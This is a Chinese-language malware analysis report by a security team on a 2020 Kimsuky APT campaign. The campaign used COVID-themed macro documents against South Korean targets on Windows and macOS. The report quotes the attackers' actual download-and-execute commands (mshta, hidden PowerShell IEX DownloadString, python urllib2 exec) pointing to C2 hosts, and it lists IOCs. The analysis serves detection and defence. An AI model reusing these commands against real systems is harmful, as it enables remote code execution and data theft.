Kimsuky APT組織利用疫情話題針對南韓進行雙平臺的攻擊活動的分析

Gcow安全團隊發表於2020-03-23

# Kimsuky APT組織利用疫情話題針對南韓進行雙平臺的攻擊活動的分析

 

圖片1 封面

一.前言

kimsuky APT組織(又名Mystery Baby, Baby Coin, Smoke Screen, BabyShark, Cobra Venom) ,該組織一直針對於韓國的智囊團,政府組織,新聞組織,大學教授等等進行活動.並且該組織擁有windows平臺的攻擊能力,載荷便捷,階段繁多。並且該組織十分活躍.其載荷有帶有漏洞的hwp檔案,惡意巨集檔案,釋放載荷的PE檔案

 

近日,隨著海外病例的增加,使用新型冠狀病毒為題材的攻擊活動愈來愈多.例如:海蓮花APT組織通過白加黑的手段向中國的政府部門進行魚叉投遞,摩訶草APT組織冒充我國的重點部門針對政府和醫療部門的攻擊活動,毒雲藤和藍寶菇組織通過釣魚的方式竊取人員的郵箱密碼,藉以達到竊密或者是為下一階段做準備的目的以及蔓靈花組織繼續採用SFX文件的方式對我國重點設施進行投放.

 

同時,在朝鮮半島的爭奪也隨之展開.Gcow安全團隊追影小組在日常的檔案監控之中發現名為kimsukyAPT組織採用郵件魚叉的方式針對韓國的新聞部門,政府部門等進行攻擊活動,並且在此次活動之中體現出該組織在攻擊過程中使用輕量化,多階段指令碼載荷的特點.並且在本次活動中我們看到了該組織使用python針對MacOS平臺進行無檔案的攻擊活動.

 

下面筆者將從攻擊Windows平臺的樣本以及攻擊MacOs平臺的樣本進行分析

二.Windwos平臺樣本分析:

1.코로나바이러스 대응.doc(冠狀病毒反應.doc)

0x00.樣本資訊:

樣本資訊 코로나바이러스 대응(冠狀病毒反應)
樣本名稱 코로나바이러스 대응.doc(冠狀病毒反應.doc)
樣本MD5 A9DAC36EFD7C99DC5EF8E1BF24C2D747
樣本SHA-1 CBB8985404281455BBCF02354060FB1E7576D4C2
樣本SHA-256 2CD5F1852AC6D3ED481394EA0ABC49F16789C12FB81BCDF9988762730FB0AA8F
利用方法 巨集
樣本型別 Microsoft Word 2007+
樣本大小 81.13 KB
最初上傳時間 2020-02-27 08:52:50
 

該樣本利用社會工程學的辦法,誘使目標點選“啟用內容”來執行巨集的惡意程式碼。啟用巨集後顯示的正文內容。通過谷歌翻譯,提取到幾個關鍵詞:新型冠狀病毒
可以看出,這可能是針對韓國政府發起的一次攻擊活動。

 

誘餌文件原文以及翻譯

 

攻擊者通過魚叉郵件附件的方式將惡意載荷投遞給受害目標

 

釣魚郵件附件

0x01. 樣本分析

利用olevba工具提取的巨集程式碼如下:
其將執行的命令通過hex編碼的形式在巨集裡面自己解碼後隱藏執行
所執行的命令為:

 

mshta http://vnext.mireene.com/theme/basic/skin/member/basic/upload/search.hta /f

 

執行mshta命令載入search.hta

search.hta

其主要內嵌的是vbs程式碼,請求URL以獲取下一段的vbs程式碼,並且執行獲取到的vbs程式碼

 

URL地址為:http://vnext.mireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=1

 

獲取下一段vbs程式碼並執行

1.vbs

下一段的vbs程式碼就是其偵查者的主體程式碼:

 

1.資訊收集部分:

 

收集本機名以及本機所在域的名稱,ip地址,使用者名稱稱, %programfiles%下的檔案, %programfiles% (x86)下的檔案,安裝軟體資訊,開始欄的專案,最近開啟的專案,程式列表,系統版本資訊,set設定資訊,遠端桌面連線資訊, ,arp資訊, %appdata%\Microsoft下所有檔案以及子檔案資訊,文件資料夾資訊,下載檔案資訊,powershell資料夾下的檔案資訊,碟符資訊,巨集的安全性資訊,outlook資訊等等

 

資訊收集1

 

資訊收集2

 

2.新增計劃任務以佈置下一階段的載荷:

 

偽裝成Acrobat更新的任務

 

執行命令: mshta http://vnext.mireene.com/theme/basic/skin/member/basic/upload/cfhkjkk.hta

 

獲取當前時間,延遲後執行schtasks創造該計劃任務

 

schtasks創造計劃任務

cfhkjkk.hta

search.hta一樣,也是一樣的中轉的程式碼,URL為:http://vnext.mireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=2

 

圖片10 中轉hta

2.vbs

其同樣也是vbs檔案.其主要的功能是檢視%Appdata%\Windows\desktop.ini是否存在,如果存在則利用certutil -f -encode對檔案進行編碼並且輸出為%Appdata%\Windows\res.ini,並且從URL地址下載http://vnext.mireene.com/theme/basic/skin/member/basic/upload/download.php?param=res1.txt編碼後的powershell命令隱藏執行,執行成功後刪除Appdata%\Windows\desktop.ini.並且從URL地址下載http://vnext.mireene.com/theme/basic/skin/member/basic/upload/download.php?param=res2.txt編碼後的powershell命令隱藏執行.

 

圖片11 2.vbs

res1.txt

powershell命令主要功能就是讀取Appdata%\Windows\res.ini檔案裡的內容,再組成HTTP報文後利用UploadString上傳到C2,C2地址為:http://vnext.mireene.com/theme/basic/skin/member/basic/upload/wiujkjkjk.php

 

圖片12 res1.txt

res2.txt

powershell命令主要功能是通過對比按鍵ASCII碼值記錄資訊

 

我們可以看到被黑的站點是一個購物平臺,攻擊者應該入侵這個購物平臺後把相應的惡意載荷掛到該網站.

 

所入侵的網站截圖

 

網站內容翻譯

 

此外我們通過比較相同的巨集程式碼發現了其一個類似的樣本

2.비건 미국무부 부장관 서신 20200302.doc(美國國務卿素食主義者20200302.doc)

0x00.樣本資訊

樣本資訊 비건 미국무부 부장관 서신 20200302(美國國務卿素食主義者20200302)
樣本名稱 비건 미국무부 부장관 서신 20200302.doc(美國國務卿素食主義者20200302.doc)
樣本MD5 5F2D3ED67A577526FCBD9A154F522CCE
樣本SHA-1 15042D5B394E4867014525276FCBA54C52208B8B
樣本SHA-256 7C0F8D6CF4F908CCE8B7F65F2B5EE06A311D28EE6D8F1B32E90AF4D08C2AB327
利用方法 巨集
樣本型別 Microsoft Word 2007+
樣本大小 85.67 KB
最初上傳時間 2020-03-03 04:20:21
 

誘餌文件原文以及翻譯

 

該樣本利用社會工程學的辦法,誘使目標點選“啟用內容”來執行巨集的惡意程式碼。啟用巨集後顯示的正文內容。通過谷歌翻譯,提取到幾個關鍵詞:朝鮮半島 政策
可以看出,這可能是針對韓國政府機構發起的一次攻擊活動。

0x01 樣本分析

其與上文所述相同不過,本樣本執行的命令是:

 

mshta http://nhpurumy.mireene.com/theme/basic/skin//member/basic/upload/search.hta /f

 

用mshta載入search.hta

 

相同的中轉search.hta

 

中轉地址為:http://nhpurumy.mireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=1

 

獲取下一階段vbs程式碼並且執行

 

其執行的vbs程式碼與上文類似,在這裡就不做贅述了.不過其計劃任務所執行的第二部分htaurl地址為:
http://nhpurumy.mireene.com/theme/basic/skin/member/basic/upload/cfhkjkk.hta

 

新增計劃任務並且延遲執行

 

之後的部分程式碼與上文相同,不過其C2的地址為nhpurumy.mireene.com。在此就不贅述了。

 

被入侵的網站可能是一個廣告公司:

 

被入侵公司官網截圖

 

被入侵公司官網內容

3.붙임. 전문가 칼럼 원고 작성 양식.doc(附上.專家專欄手稿表格.doc)

0x01文件資訊:

樣本資訊:
樣本資訊 붙임. 전문가 칼럼 원고 작성 양식(附上.專家專欄手稿表格)
檔名稱 붙임. 전문가 칼럼 원고 작성 양식.doc
樣本MD5 07d0be79be38ecb8c7b1c80ab0bd8344
樣本SHA1 3acfda840986f215bec88cefa0dfb34b44750508
樣本SHA256 1fcd9892532813a27537f4e1a1c21ec0c110d6b3929602750ed77bbba7caa426
利用方法 巨集
樣本型別 Microsoft Word 2007+
樣本大小 112.96KB
VT最初上傳時間 2020-03-18 01:47:59
 

該樣本利用社會工程學的辦法,誘使目標點選“啟用內容”來執行巨集的惡意程式碼。啟用巨集後顯示的正文內容。通過谷歌翻譯,提取到幾個關鍵詞:稿件、專家專欄
可以看出,這可能是針對韓國新聞機構發起的一次攻擊活動。

 

誘餌文件內容以及翻譯

0x02 惡意巨集分析

利用olevba工具提取的巨集程式碼如下:

 

olevba提取巨集程式碼

 

顯示文件的內容:

 

顯示文件內容

 

隱藏執行powershell.exe程式碼讀取%TEMP%\bobo.txt的內容,並且使用iex執行

 

隱藏執行powershell執行bobo.txt裡內容

 

Bobo.txt內容

 

Bobo.txt中的內容

 

http://mybobo.mygamesonline.org/flower01/flower01.ps1上下載第二段powershell載荷flower01.ps1並且利用iex記憶體執行

 

第二段powershell載荷如圖所示:

 

第二段powershell載荷

0x03 惡意powershell分析

Powershell後門配置資訊:

 

第二段powershell載荷配置資訊

 

寫入登錄檔啟動項,鍵名: Alzipupdate,鍵值:

cmd.exe /c powershell.exe -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://mybobo.mygamesonline.org/flower01/flower01.ps1')

開機啟動就遠端執行本ps1檔案

 

新增登錄檔以開機啟動

 

收集資訊:最近使用的專案(檔案),%ProgramFiles%以及C:\Program Files (x86)下的檔案,系統資訊,當前程式資訊

 

收集本機資訊

 

將這些結果寫入%Appdata%\flower01\flower01.hwp

 

將收集結果寫入flower01.hwp中

 

Flower01.hwp內容:

 

flower01.hwp內容

 

將收集到的資訊迴圈上傳到C2並且接收回顯執行

 

將收集到的資訊上傳到c2

 

上傳函式:

 

將資料上傳到http://mybobo.mygamesonline.org/flower01/post.php

 

上傳flower01.hwp檔案

 

具體上傳程式碼

 

下載函式:

 

請求URL地址:http://mybobo.mygamesonline.org/flower01/flower01.down獲得
第二階段被加密的載荷,解密後通過新增程式碼塊以及新建工作的方式指行第二段載荷

 

下載解密並執行

 

執行完畢後向C2地址請
求:"http://mybobo.mygamesonline.org/flower01/del.php?filename=flower01"標誌載荷已經執行成功

 

反饋執行成功資訊

 

為了方便各位看官理解,刻意繪製了兩張流程圖描述該後門的情況

 

圖一如下: 是第三個樣本的流程圖 全過程存在一個惡意檔案落地.

 

 

圖二如下: 是前兩個樣本的流程圖 全過程無任何惡意檔案落地

 

三.MacOS平臺的樣本分析:

1.COVID-19 and North Korea.docx(COVID-19與朝鮮.docx)

0x00. 樣本資訊

樣本資訊 COVID-19 and North Korea(COVID-19與朝鮮)
樣本名稱 COVID-19 and North Korea.docx
樣本MD5 A4388C4D0588CD3D8A607594347663E0
樣本SHA-1 B066369BBD48B7858F2C1EED1E78D85C8AE4CDB6
樣本SHA256 7D2B9F391588CC07D9BA78D652819D32D3D79E5A74086B527C32126AD88B5015
利用方式 遠端模板注入 + 巨集
樣本型別 Microsoft Word 2007+
樣本大小 220.16 KB (225448 bytes)
VT最初上傳時間 2020-03-19 11:04:09

0x01 樣本分析

該樣本是docx檔案,攻擊者運用社會工程學的手法,設定了一張在MAC系統啟動巨集文件的圖片,來誘導受害者點選啟動巨集,當受害者啟動巨集後該樣本就會移除圖片顯示出文件的內容

 

誘餌文件內容與翻譯

 

由此可見,我們可以看到該樣本與新型冠狀病毒的話題有關,可能針對的是韓國的政府機構

 

該樣本利用遠端模板注入技術對遠端模板進行載入

 

遠端模板URL:"http://crphone.mireene.com/plugin/editor/Templates/normal.php?name=web"

 

遠端模板注入技術

 

巨集程式碼會將之前遮蓋的部分顯示,用以迷惑受害者,相關程式碼:

 

去掉保護顯示文件

 

該樣本會判斷是否是MAC系統,若是MAC系統就會執行python命令下載第一階段的python程式碼

 

命令為:

python -c exec(urllib2.urlopen(urllib2.Request('http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=v1')).read())

執行第一階段python惡意程式碼

 

第一階段的python程式碼主要起到一箇中轉的作用

 

其會執行如下程式碼去載入第二階段的python程式碼:

urllib2.urlopen(urllib2.Request('http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=v60')).read()

執行第二階段python惡意程式碼

 

第二段python程式碼類似於一個偵察者:

a.收集資訊

其會收集系統位數資訊,系統資訊,所安裝的APP列表, 檔案列表, 下載檔案列表, 碟符資訊等,並且將這些資料寫入對應的txt檔案中於惡意樣本所創造的工作目錄下

 

收集資訊

b.打包所收集的資訊

首先先刪除backup.rar檔案,再將工作目錄下的所有txt檔案利用zip -m -z命令進行打包,輸出為backup.rar檔案

 

打包資訊

c.將收集的資訊回傳到C2

通過建立Http連結,將rar的資料組成報文,傳送到C2: http://crphone.mireene.com/plugin/editor/Templates/upload.php

 

將資訊上傳到C2

d.向C2請求獲取新的python程式碼

更新程式碼:

urllib2.urlopen(urllib2.Request('http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=new')).read()

http://crphone.mireene.com/plugin/editor/Templates/filedown.php?name=new獲取新的Python載荷

 

獲取下一階段python載荷

 

其創造一個執行緒,迴圈執行收集機器資訊並且上傳,不斷向C2請求執行新的python程式碼,中間休息300秒,這也解釋了為什麼在打包資訊的時候需要先刪除backup.rar

 

 

從本次C2的域名: crphone.mireene.com來看,應該是一個賣智慧手機的網站

 

被入侵網站頁面

 

頁面裡的內容

 

為了方便各位看官理解,筆者繪製了一張流程圖:
kimsuky針對macos平臺無檔案攻擊的樣本的流程圖

四.關聯與總結:

1.關聯

(1).組成上線報文的特徵

kimsuky APT組織之前的樣本中所組成的上線報文中含有類似於7e222d1d50232以及WebKitFormBoundarywhpFxMBe19cSjFnG的特徵上線字元

 

WebKitFormBoundarywhpFxMBe19cSjFnG:

 

 

7e222d1d50232:

 

(2).資訊收集程式碼相似性

kimsuky APT組織之前的樣本中,我們發現了該組織在進行windows平臺下的資訊收集程式碼存在很大的相似性.比如收集資訊所使用的命令,包含了上文所提到的各類資訊收集的內容.雖然在較新的時候做了簡化.但是依舊可以反映出二者的同源性

 

圖片57 關聯-資訊收集程式碼相似性

2.總結

kimsukyAPT組織是值得關注的威脅者

 

Kimsuky APT組織作為一個十分活動的APT組織,其針對南韓的活動次數也愈來愈多,同時該組織不斷的使用hwp檔案,釋放誘餌文件可執行檔案(scr),惡意巨集文件的方式針對Windows目標進行相應的攻擊.同時惡意巨集文件還用於攻擊MacOs目標之中,這與相同背景的Lazarus組織有一定的相似之處,該組織擁有了針對windows,MacOs兩大平臺的攻擊能力。日後說不一定會出現Andorid端的攻擊框架。

 

同時該組織的載荷也由之前的PE檔案載荷逐漸變為多級指令碼載荷,這不僅僅增加了其靈活性,而且有助於其逃過部分防毒軟體的查殺.但是其混淆的策略不夠成熟,所以其對規避殺軟的能力還是較弱。

 

並且該組織的後門逐漸採取少落地或者不落地的方式,這在一定層面上加大了檢測的難度.但是其沒有考慮到AMSI以及scriptblock等.所以防毒軟體依舊是可以進行防護的.

 

最後,該組織的成員應該是通過入侵該網站後在該網站下掛上了部署C2以做好白名單策略,減少被目標防護軟體的檢測的概率.比如在這次活動中,其入侵帶有動態域名的網站將載荷不至於上面。同時該稅法也在之前的活動中有所體現。

 

正如一開始所講的那樣該組織是一個很值得關注的威脅者.不過該組織現在仍然處於上身階段,其不斷進行自我的更新以及廣撒網式的大量投遞樣本也表現出其的不成熟性,但這更需要我們保持警惕.以及與之有相同背景的Group123以及KonniAPT組織.

五.IOCs:

MD5:

757a71f0fbd6b3d993be2a213338d1f2

 

5f2d3ed67a577526fcbd9a154f522cce

 

07D0BE79BE38ECB8C7B1C80AB0BD8344

 

A4388C4D0588CD3D8A607594347663E0

 

5EE1DE01EABC7D62DC7A4DAD0B0234BF

 

1B6D8837C21093E4B1C92D5D98A40ED4

 

A9DAC36EFD7C99DC5EF8E1BF24C2D747

 

163911824DEFE23439237B6D460E8DAD

 

9F85509F94C4C28BB2D3FD4E205DE857

 

5F2D3ED67A577526FCBD9A154F522CCE

C2:

vnext[.]mireene[.]com

 

nhpurumy[.]mireene[.]com

 

mybobo[.]mygamesonline[.]org

 

crphone[.]mireene[.]com

URL:

vnext[.]mireene[.]com/theme/basic/skin//member/basic/upload/search[.]hta

 

vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/eweerew[.]php?er=1

 

vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/cfhkjkk[.]hta

 

vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/eweerew[.]php?er=2

 

vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/download[.]php?param=res1.txt

 

vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/download[.]php?param=res2.txt

 

vnext[.]mireene[.]com/theme/basic/skin/member/basic/upload/wiujkjkjk[.]php

 

nhpurumy[.]mireene[.]com/theme/basic/skin//member/basic/upload/search[.]hta

 

nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/eweerew[.]php?er=1

 

nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/cfhkjkk[.]hta

 

nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/eweerew[.]php?er=2

 

/nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/download[.]php?param=res1.txt

 

nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/download[.]php?param=res2.txt

 

nhpurumy[.]mireene[.]com/theme/basic/skin/member/basic/upload/wiujkjkjk[.]php

 

crphone[.]mireene[.]com/plugin/editor/Templates/normal[.]php?name=web

 

crphone[.]mireene[.]com/plugin/editor/Templates/filedown[.]php?name=v1

 

crphone[.]mireene[.]com/plugin/editor/Templates/filedown[.]php?name=v60

 

crphone[.]mireene[.]com/plugin/editor/Templates/upload[.]php

 

crphone[.]mireene[.]com/plugin/editor/Templates/filedown[.]php?name=new

 

crphone[.]mireene[.]com/plugin/editor/Templates/filedown[.]php?name=normal

 

mybobo[.]mygamesonline[.]org/flower01/post[.]php

 

mybobo[.]mygamesonline[.]org/flower01/flower01[.]down

 

mybobo[.]mygamesonline[.]org/flower01/del[.]php?filename=flower01

 

mybobo[.]mygamesonline[.]org/flower01/flower01.ps1

六.參考連結:

https://mp.weixin.qq.com/s/ISVYVrjrOUk4bzK5We6X-Q

 

https://blog.alyac.co.kr/2779

 

關注公眾號獲取更多技術文章

 

相關文章